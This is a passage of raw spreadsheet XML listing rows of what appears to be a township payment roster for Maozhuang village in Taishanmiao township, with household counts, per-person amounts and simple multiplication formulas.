        <v>4113210704</v>
      </c>
      <c r="G2205" s="17"/>
      <c r="H2205" s="17"/>
      <c r="I2205" s="17"/>
      <c r="J2205" s="17"/>
      <c r="K2205" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2206" customHeight="1" spans="1:11">
      <c r="A2206" s="16" t="s">
        <v>5808</v>
      </c>
      <c r="B2206" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2206" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2206" s="17" t="s">
        <v>5809</v>
      </c>
      <c r="E2206" s="17" t="s">
        <v>5569</v>
      </c>
      <c r="F2206" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2206" s="17">
        <v>2</v>
      </c>
      <c r="H2206" s="18">
        <v>325</v>
      </c>
      <c r="I2206" s="17">
        <f>H2206*G2206</f>
        <v>650</v>
      </c>
      <c r="J2206" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2206" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2207" customHeight="1" spans="1:11">
      <c r="A2207" s="16" t="s">
        <v>5810</v>
      </c>
      <c r="B2207" s="17" t="str">
        <f>B2206</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2207" s="17" t="str">
        <f>C2206</f>
        <v>毛庄村</v>
      </c>
      <c r="D2207" s="16" t="s">
        <v>5811</v>
      </c>
      <c r="E2207" s="16" t="s">
        <v>5460</v>
      </c>
      <c r="F2207" s="17">
        <f>F2206</f>
        <v>4113210704</v>
      </c>
      <c r="G2207" s="17"/>
      <c r="H2207" s="17"/>
      <c r="I2207" s="17"/>
      <c r="J2207" s="17"/>
      <c r="K2207" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2208" customHeight="1" spans="1:11">
      <c r="A2208" s="16" t="s">
        <v>5812</v>
      </c>
      <c r="B2208" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2208" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2208" s="17" t="s">
        <v>5813</v>
      </c>
      <c r="E2208" s="17" t="s">
        <v>5513</v>
      </c>
      <c r="F2208" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2208" s="17">
        <v>1</v>
      </c>
      <c r="H2208" s="18">
        <v>365</v>
      </c>
      <c r="I2208" s="17">
        <f>H2208*G2208</f>
        <v>365</v>
      </c>
      <c r="J2208" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2208" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2209" customHeight="1" spans="1:11">
      <c r="A2209" s="16" t="s">
        <v>5814</v>
      </c>
      <c r="B2209" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2209" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2209" s="17" t="s">
        <v>5815</v>
      </c>
      <c r="E2209" s="17" t="s">
        <v>5816</v>
      </c>
      <c r="F2209" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2209" s="17">
        <v>1</v>
      </c>
      <c r="H2209" s="18">
        <v>365</v>
      </c>
      <c r="I2209" s="17">
        <f>H2209*G2209</f>
        <v>365</v>
      </c>
      <c r="J2209" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2209" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2210" customHeight="1" spans="1:11">
      <c r="A2210" s="16" t="s">
        <v>5817</v>
      </c>
      <c r="B2210" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2210" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2210" s="17" t="s">
        <v>5818</v>
      </c>
      <c r="E2210" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2210" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2210" s="17">
        <v>2</v>
      </c>
      <c r="H2210" s="18">
        <v>325</v>
      </c>
      <c r="I2210" s="17">
        <f>H2210*G2210</f>
        <v>650</v>
      </c>
      <c r="J2210" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2210" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2211" customHeight="1" spans="1:11">
      <c r="A2211" s="16" t="s">
        <v>5819</v>
      </c>
      <c r="B2211" s="17" t="str">
        <f>B2210</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2211" s="17" t="str">
        <f>C2210</f>
        <v>毛庄村</v>
      </c>
      <c r="D2211" s="16" t="s">
        <v>5820</v>
      </c>
      <c r="E2211" s="16" t="s">
        <v>5821</v>
      </c>
      <c r="F2211" s="17">
        <f>F2210</f>
        <v>4113210704</v>
      </c>
      <c r="G2211" s="17"/>
      <c r="H2211" s="17"/>
      <c r="I2211" s="17"/>
      <c r="J2211" s="17"/>
      <c r="K2211" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2212" customHeight="1" spans="1:11">
      <c r="A2212" s="16" t="s">
        <v>5822</v>
      </c>
      <c r="B2212" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2212" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2212" s="17" t="s">
        <v>5823</v>
      </c>
      <c r="E2212" s="17" t="s">
        <v>5513</v>
      </c>
      <c r="F2212" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2212" s="17">
        <v>1</v>
      </c>
      <c r="H2212" s="18">
        <v>365</v>
      </c>
      <c r="I2212" s="17">
        <f>H2212*G2212</f>
        <v>365</v>
      </c>
      <c r="J2212" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2212" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2213" customHeight="1" spans="1:11">
      <c r="A2213" s="16" t="s">
        <v>5824</v>
      </c>
      <c r="B2213" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2213" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2213" s="17" t="s">
        <v>5825</v>
      </c>
      <c r="E2213" s="17" t="s">
        <v>5696</v>
      </c>
      <c r="F2213" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2213" s="17">
        <v>1</v>
      </c>
      <c r="H2213" s="18">
        <v>365</v>
      </c>
      <c r="I2213" s="17">
        <f>H2213*G2213</f>
        <v>365</v>
      </c>
      <c r="J2213" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2213" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2214" customHeight="1" spans="1:11">
      <c r="A2214" s="16" t="s">
        <v>5826</v>
      </c>
      <c r="B2214" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2214" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2214" s="17" t="s">
        <v>5827</v>
      </c>
      <c r="E2214" s="17" t="s">
        <v>3527</v>
      </c>
      <c r="F2214" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2214" s="17">
        <v>1</v>
      </c>
      <c r="H2214" s="18">
        <v>365</v>
      </c>
      <c r="I2214" s="17">
        <f>H2214*G2214</f>
        <v>365</v>
      </c>
      <c r="J2214" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2214" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2215" customHeight="1" spans="1:11">
      <c r="A2215" s="16" t="s">
        <v>5828</v>
      </c>
      <c r="B2215" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2215" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="D2215" s="17" t="s">
        <v>5829</v>
      </c>
      <c r="E2215" s="17" t="s">
        <v>4082</v>
      </c>
      <c r="F2215" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2215" s="17">
        <v>3</v>
      </c>
      <c r="H2215" s="18">
        <v>290</v>
      </c>
      <c r="I2215" s="17">
        <f>H2215*G2215</f>
        <v>870</v>
      </c>
      <c r="J2215" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2215" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2216" customHeight="1" spans="1:11">
      <c r="A2216" s="16" t="s">
        <v>5830</v>
      </c>
      <c r="B2216" s="17" t="str">
        <f>B2215</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2216" s="17" t="str">
        <f>C2215</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2216" s="23" t="s">
        <v>5831</v>
      </c>
      <c r="E2216" s="23" t="s">
        <v>5832</v>
      </c>
      <c r="F2216" s="17" t="str">
        <f>F2215</f>
        <v>4113210705</v>
      </c>
      <c r="G2216" s="17"/>
      <c r="H2216" s="17"/>
      <c r="I2216" s="17"/>
      <c r="J2216" s="17"/>
      <c r="K2216" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2217" customHeight="1" spans="1:11">
      <c r="A2217" s="16" t="s">
        <v>5833</v>
      </c>
      <c r="B2217" s="17" t="str">
        <f>B2216</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2217" s="17" t="str">
        <f>C2216</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2217" s="16" t="s">
        <v>5834</v>
      </c>
      <c r="E2217" s="16" t="s">
        <v>5835</v>
      </c>
      <c r="F2217" s="17" t="str">
        <f>F2216</f>
        <v>4113210705</v>
      </c>
      <c r="G2217" s="17"/>
      <c r="H2217" s="17"/>
      <c r="I2217" s="17"/>
      <c r="J2217" s="17"/>
      <c r="K2217" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2218" customHeight="1" spans="1:11">
      <c r="A2218" s="16" t="s">
        <v>5836</v>
      </c>
      <c r="B2218" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2218" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2218" s="17" t="s">
        <v>1605</v>
      </c>
      <c r="E2218" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2218" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2218" s="17">
        <v>2</v>
      </c>
      <c r="H2218" s="18">
        <v>325</v>
      </c>
      <c r="I2218" s="17">
        <f>H2218*G2218</f>
        <v>650</v>
      </c>
      <c r="J2218" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2218" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2219" customHeight="1" spans="1:11">
      <c r="A2219" s="16" t="s">
        <v>5837</v>
      </c>
      <c r="B2219" s="17" t="str">
        <f>B2218</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2219" s="17" t="str">
        <f>C2218</f>
        <v>毛庄村</v>
      </c>
      <c r="D2219" s="16" t="s">
        <v>5838</v>
      </c>
      <c r="E2219" s="16" t="s">
        <v>5839</v>
      </c>
      <c r="F2219" s="17">
        <f>F2218</f>
        <v>4113210704</v>
      </c>
      <c r="G2219" s="17"/>
      <c r="H2219" s="17"/>
      <c r="I2219" s="17"/>
      <c r="J2219" s="17"/>
      <c r="K2219" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2220" customHeight="1" spans="1:11">
      <c r="A2220" s="16" t="s">
        <v>5840</v>
      </c>
      <c r="B2220" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2220" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2220" s="17" t="s">
        <v>5841</v>
      </c>
      <c r="E2220" s="17" t="s">
        <v>5597</v>
      </c>
      <c r="F2220" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2220" s="17">
        <v>2</v>
      </c>
      <c r="H2220" s="18">
        <v>325</v>
      </c>
      <c r="I2220" s="17">
        <f>H2220*G2220</f>
        <v>650</v>
      </c>
      <c r="J2220" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2220" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2221" customHeight="1" spans="1:11">
      <c r="A2221" s="16" t="s">
        <v>5842</v>
      </c>
      <c r="B2221" s="17" t="str">
        <f>B2220</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2221" s="17" t="str">
        <f>C2220</f>
        <v>毛庄村</v>
      </c>
      <c r="D2221" s="17" t="s">
        <v>5843</v>
      </c>
      <c r="E2221" s="17" t="s">
        <v>5844</v>
      </c>
      <c r="F2221" s="17">
        <f>F2220</f>
        <v>4113210704</v>
      </c>
      <c r="G2221" s="17"/>
      <c r="H2221" s="17"/>
      <c r="I2221" s="17"/>
      <c r="J2221" s="17"/>
      <c r="K2221" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2222" customHeight="1" spans="1:11">
      <c r="A2222" s="16" t="s">
        <v>5845</v>
      </c>
      <c r="B2222" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2222" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2222" s="17" t="s">
        <v>5846</v>
      </c>
      <c r="E2222" s="17" t="s">
        <v>5699</v>
      </c>
      <c r="F2222" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2222" s="17">
        <v>1</v>
      </c>
      <c r="H2222" s="18">
        <v>365</v>
      </c>
      <c r="I2222" s="17">
        <f>H2222*G2222</f>
        <v>365</v>
      </c>
      <c r="J2222" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2222" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2223" customHeight="1" spans="1:11">
      <c r="A2223" s="16" t="s">
        <v>5847</v>
      </c>
      <c r="B2223" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2223" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2223" s="17" t="s">
        <v>5848</v>
      </c>
      <c r="E2223" s="17" t="s">
        <v>5849</v>
      </c>
      <c r="F2223" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2223" s="17">
        <v>1</v>
      </c>
      <c r="H2223" s="18">
        <v>365</v>
      </c>
      <c r="I2223" s="17">
        <f>H2223*G2223</f>
        <v>365</v>
      </c>
      <c r="J2223" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2223" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2224" customHeight="1" spans="1:11">
      <c r="A2224" s="16" t="s">
        <v>5850</v>
      </c>
      <c r="B2224" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2224" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2224" s="17" t="s">
        <v>5851</v>
      </c>
      <c r="E2224" s="17" t="s">
        <v>5420</v>
      </c>
      <c r="F2224" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2224" s="17">
        <v>2</v>
      </c>
      <c r="H2224" s="17">
        <v>550</v>
      </c>
      <c r="I2224" s="17">
        <f>H2224*G2224</f>
        <v>1100</v>
      </c>
      <c r="J2224" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2224" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2225" customHeight="1" spans="1:11">
      <c r="A2225" s="16" t="s">
        <v>5852</v>
      </c>
      <c r="B2225" s="17" t="str">
        <f>B2224</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2225" s="17" t="str">
        <f>C2224</f>
        <v>毛庄村</v>
      </c>
      <c r="D2225" s="16" t="s">
        <v>5853</v>
      </c>
      <c r="E2225" s="16" t="s">
        <v>5854</v>
      </c>
      <c r="F2225" s="17">
        <f>F2224</f>
        <v>4113210704</v>
      </c>
      <c r="G2225" s="17"/>
      <c r="H2225" s="17"/>
      <c r="I2225" s="17"/>
      <c r="J2225" s="17"/>
      <c r="K2225" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2226" customHeight="1" spans="1:11">
      <c r="A2226" s="16" t="s">
        <v>5855</v>
      </c>
      <c r="B2226" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2226" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2226" s="17" t="s">
        <v>5856</v>
      </c>
      <c r="E2226" s="17" t="s">
        <v>5499</v>
      </c>
      <c r="F2226" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2226" s="17">
        <v>1</v>
      </c>
      <c r="H2226" s="18">
        <v>365</v>
      </c>
      <c r="I2226" s="17">
        <f>H2226*G2226</f>
        <v>365</v>
      </c>
      <c r="J2226" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2226" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2227" customHeight="1" spans="1:11">
      <c r="A2227" s="16" t="s">
        <v>5857</v>
      </c>
      <c r="B2227" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2227" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2227" s="17" t="s">
        <v>5858</v>
      </c>
      <c r="E2227" s="17" t="s">
        <v>5699</v>
      </c>
      <c r="F2227" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2227" s="17">
        <v>2</v>
      </c>
      <c r="H2227" s="18">
        <v>325</v>
      </c>
      <c r="I2227" s="17">
        <f>H2227*G2227</f>
        <v>650</v>
      </c>
      <c r="J2227" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2227" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2228" customHeight="1" spans="1:11">
      <c r="A2228" s="16" t="s">
        <v>5859</v>
      </c>
      <c r="B2228" s="17" t="str">
        <f>B2227</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2228" s="17" t="str">
        <f>C2227</f>
        <v>毛庄村</v>
      </c>
      <c r="D2228" s="16" t="s">
        <v>5860</v>
      </c>
      <c r="E2228" s="16" t="s">
        <v>5443</v>
      </c>
      <c r="F2228" s="17">
        <f>F2227</f>
        <v>4113210704</v>
      </c>
      <c r="G2228" s="17"/>
      <c r="H2228" s="17"/>
      <c r="I2228" s="17"/>
      <c r="J2228" s="17"/>
      <c r="K2228" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2229" customHeight="1" spans="1:11">
      <c r="A2229" s="16" t="s">
        <v>5861</v>
      </c>
      <c r="B2229" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2229" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2229" s="17" t="s">
        <v>2723</v>
      </c>
      <c r="E2229" s="17" t="s">
        <v>5420</v>
      </c>
      <c r="F2229" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2229" s="17">
        <v>1</v>
      </c>
      <c r="H2229" s="18">
        <v>365</v>
      </c>
      <c r="I2229" s="17">
        <f>H2229*G2229</f>
        <v>365</v>
      </c>
      <c r="J2229" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2229" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2230" customHeight="1" spans="1:11">
      <c r="A2230" s="16" t="s">
        <v>5862</v>
      </c>
      <c r="B2230" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2230" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2230" s="17" t="s">
        <v>5863</v>
      </c>
      <c r="E2230" s="17" t="s">
        <v>5864</v>
      </c>
      <c r="F2230" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2230" s="17">
        <v>1</v>
      </c>
      <c r="H2230" s="18">
        <v>365</v>
      </c>
      <c r="I2230" s="17">
        <f>H2230*G2230</f>
        <v>365</v>
      </c>
      <c r="J2230" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2230" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2231" customHeight="1" spans="1:11">
      <c r="A2231" s="16" t="s">
        <v>5865</v>
      </c>
      <c r="B2231" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2231" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2231" s="17" t="s">
        <v>667</v>
      </c>
      <c r="E2231" s="17" t="s">
        <v>5522</v>
      </c>
      <c r="F2231" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2231" s="17">
        <v>1</v>
      </c>
      <c r="H2231" s="18">
        <v>365</v>
      </c>
      <c r="I2231" s="17">
        <f>H2231*G2231</f>
        <v>365</v>
      </c>
      <c r="J2231" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2231" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2232" customHeight="1" spans="1:11">
      <c r="A2232" s="16" t="s">
        <v>5866</v>
      </c>
      <c r="B2232" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2232" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2232" s="17" t="s">
        <v>5867</v>
      </c>
      <c r="E2232" s="17" t="s">
        <v>5519</v>
      </c>
      <c r="F2232" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2232" s="17">
        <v>1</v>
      </c>
      <c r="H2232" s="18">
        <v>365</v>
      </c>
      <c r="I2232" s="17">
        <f>H2232*G2232</f>
        <v>365</v>
      </c>
      <c r="J2232" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2232" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2233" customHeight="1" spans="1:11">
      <c r="A2233" s="16" t="s">
        <v>5868</v>
      </c>
      <c r="B2233" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2233" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2233" s="17" t="s">
        <v>5869</v>
      </c>
      <c r="E2233" s="17" t="s">
        <v>3527</v>
      </c>
      <c r="F2233" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2233" s="17">
        <v>2</v>
      </c>
      <c r="H2233" s="18">
        <v>325</v>
      </c>
      <c r="I2233" s="17">
        <f>H2233*G2233</f>
        <v>650</v>
      </c>
      <c r="J2233" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2233" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2234" customHeight="1" spans="1:11">
      <c r="A2234" s="16" t="s">
        <v>5870</v>
      </c>
      <c r="B2234" s="17" t="str">
        <f>B2233</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2234" s="17" t="str">
        <f>C2233</f>
        <v>毛庄村</v>
      </c>
      <c r="D2234" s="16" t="s">
        <v>5871</v>
      </c>
      <c r="E2234" s="16" t="s">
        <v>5042</v>
      </c>
      <c r="F2234" s="17">
        <f>F2233</f>
        <v>4113210704</v>
      </c>
      <c r="G2234" s="17"/>
      <c r="H2234" s="17"/>
      <c r="I2234" s="17"/>
      <c r="J2234" s="17"/>
      <c r="K2234" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2235" customHeight="1" spans="1:11">
      <c r="A2235" s="16" t="s">
        <v>5872</v>
      </c>
      <c r="B2235" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2235" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2235" s="17" t="s">
        <v>5873</v>
      </c>
      <c r="E2235" s="17" t="s">
        <v>4380</v>
      </c>
      <c r="F2235" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2235" s="17">
        <v>2</v>
      </c>
      <c r="H2235" s="18">
        <v>325</v>
      </c>
      <c r="I2235" s="17">
        <f>H2235*G2235</f>
        <v>650</v>
      </c>
      <c r="J2235" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2235" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2236" customHeight="1" spans="1:11">
      <c r="A2236" s="16" t="s">
        <v>5874</v>
      </c>
      <c r="B2236" s="17" t="str">
        <f>B2235</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2236" s="17" t="str">
        <f>C2235</f>
        <v>毛庄村</v>
      </c>
      <c r="D2236" s="16" t="s">
        <v>5875</v>
      </c>
      <c r="E2236" s="25" t="s">
        <v>5478</v>
      </c>
      <c r="F2236" s="17">
        <f>F2235</f>
        <v>4113210704</v>
      </c>
      <c r="G2236" s="17"/>
      <c r="H2236" s="17"/>
      <c r="I2236" s="17"/>
      <c r="J2236" s="17"/>
      <c r="K2236" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2237" customHeight="1" spans="1:11">
      <c r="A2237" s="16" t="s">
        <v>5876</v>
      </c>
      <c r="B2237" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2237" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2237" s="17" t="s">
        <v>5877</v>
      </c>
      <c r="E2237" s="17" t="s">
        <v>5878</v>
      </c>
      <c r="F2237" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2237" s="17">
        <v>2</v>
      </c>
      <c r="H2237" s="18">
        <v>325</v>
      </c>
      <c r="I2237" s="17">
        <f>H2237*G2237</f>
        <v>650</v>
      </c>
      <c r="J2237" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2237" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2238" customHeight="1" spans="1:11">
      <c r="A2238" s="16" t="s">
        <v>5879</v>
      </c>
      <c r="B2238" s="17" t="str">
        <f>B2237</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2238" s="17" t="str">
        <f>C2237</f>
        <v>毛庄村</v>
      </c>
      <c r="D2238" s="16" t="s">
        <v>5880</v>
      </c>
      <c r="E2238" s="17" t="s">
        <v>5881</v>
      </c>
      <c r="F2238" s="17">
        <f>F2237</f>
        <v>4113210704</v>
      </c>
      <c r="G2238" s="17"/>
      <c r="H2238" s="17"/>
      <c r="I2238" s="17"/>
      <c r="J2238" s="17"/>
      <c r="K2238" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2239" customHeight="1" spans="1:11">
      <c r="A2239" s="16" t="s">
        <v>5882</v>
      </c>
      <c r="B2239" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2239" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2239" s="17" t="s">
        <v>5883</v>
      </c>
      <c r="E2239" s="17" t="s">
        <v>2806</v>
      </c>
      <c r="F2239" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2239" s="17">
        <v>3</v>
      </c>
      <c r="H2239" s="18">
        <v>290</v>
      </c>
      <c r="I2239" s="17">
        <f>H2239*G2239</f>
        <v>870</v>
      </c>
      <c r="J2239" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2239" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2240" customHeight="1" spans="1:11">
      <c r="A2240" s="16" t="s">
        <v>5884</v>
      </c>
      <c r="B2240" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2240" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2240" s="75" t="s">
        <v>5885</v>
      </c>
      <c r="E2240" s="75" t="s">
        <v>5886</v>
      </c>
      <c r="F2240" s="76">
        <v>4113210704</v>
      </c>
      <c r="G2240" s="75"/>
      <c r="H2240" s="75"/>
      <c r="I2240" s="77"/>
      <c r="J2240" s="75" t="s">
        <v>5887</v>
      </c>
      <c r="K2240" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2241" customHeight="1" spans="1:11">
      <c r="A2241" s="16" t="s">
        <v>5888</v>
      </c>
      <c r="B2241" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2241" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2241" s="16" t="s">
        <v>5889</v>
      </c>
      <c r="E2241" s="16" t="s">
        <v>5890</v>
      </c>
      <c r="F2241" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2241" s="16"/>
      <c r="H2241" s="16"/>
      <c r="I2241" s="78"/>
      <c r="J2241" s="75" t="s">
        <v>5887</v>
      </c>
      <c r="K2241" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2242" customHeight="1" spans="1:11">
      <c r="A2242" s="16" t="s">
        <v>5891</v>
      </c>
      <c r="B2242" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2242" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2242" s="17" t="s">
        <v>5892</v>
      </c>
      <c r="E2242" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2242" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2242" s="17">
        <v>1</v>
      </c>
      <c r="H2242" s="18">
        <v>365</v>
      </c>
      <c r="I2242" s="17">
        <f t="shared" ref="I2242:I2247" si="107">H2242*G2242</f>
        <v>365</v>
      </c>
      <c r="J2242" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2242" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2243" customHeight="1" spans="1:11">
      <c r="A2243" s="16" t="s">
        <v>5893</v>
      </c>
      <c r="B2243" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2243" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2243" s="17" t="s">
        <v>5894</v>
      </c>
      <c r="E2243" s="17" t="s">
        <v>5895</v>
      </c>
      <c r="F2243" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2243" s="17">
        <v>1</v>
      </c>
      <c r="H2243" s="18">
        <v>365</v>
      </c>
      <c r="I2243" s="17">
        <f t="shared" si="107"/>
        <v>365</v>
      </c>
      <c r="J2243" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2243" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2244" customHeight="1" spans="1:11">
      <c r="A2244" s="16" t="s">
        <v>5896</v>
      </c>
      <c r="B2244" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2244" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2244" s="17" t="s">
        <v>5897</v>
      </c>
      <c r="E2244" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2244" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2244" s="17">
        <v>1</v>
      </c>
      <c r="H2244" s="18">
        <v>365</v>
      </c>
      <c r="I2244" s="17">
        <f t="shared" si="107"/>
        <v>365</v>
      </c>
      <c r="J2244" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2244" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2245" customHeight="1" spans="1:11">
      <c r="A2245" s="16" t="s">
        <v>5898</v>
      </c>
      <c r="B2245" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2245" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2245" s="17" t="s">
        <v>5899</v>
